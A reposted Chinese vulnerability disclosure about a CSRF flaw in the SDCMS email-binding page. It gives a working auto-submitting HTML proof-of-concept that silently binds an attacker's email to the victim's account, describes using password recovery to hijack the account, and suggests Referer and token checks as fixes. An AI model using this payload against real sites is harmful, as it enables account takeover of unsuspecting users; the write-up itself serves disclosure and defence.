好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

SDCMS某功能限制不严导致可CSRF劫持账户 - 网站安

SDCMS邮件绑定csrf可劫持账户

1、在SDCMS的邮件绑定处,未作任何防御,导致csrf

 

 

poc:

<html> <body> <form id="xfkxfk" name="xfkxfk" action="http://localhost/sdcms/user/email. asp ?act=checkdb" method="POST"> <input type="text" name="email" value="88888888@qq.com" /> <input type="submit" value="submit"> </form> <script> document.xfkxfk.submit(); </script> </body> </ html >

 

 

2、我们在本地打开poc:

 

 

3、然后看看邮箱,成功修改:

 

 

4、由于通过csrf可以绑定任意用户任意邮箱,所以可以通过找回密码,发送密码到我们绑定的邮箱中,从而劫持会员账户。 

   

修复方案: 1、判断请求的referer

 

2、在url中加上token 

 

查看更多关于SDCMS某功能限制不严导致可CSRF劫持账户 - 网站安的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did14903
  阅读:51次

上一篇: PhpVibe 3.1多重缺陷及修复 - 网站安全 - 自学php

下一篇:ShopEx某处平衡权限及修复 - 网站安全 - 自学php

相关资讯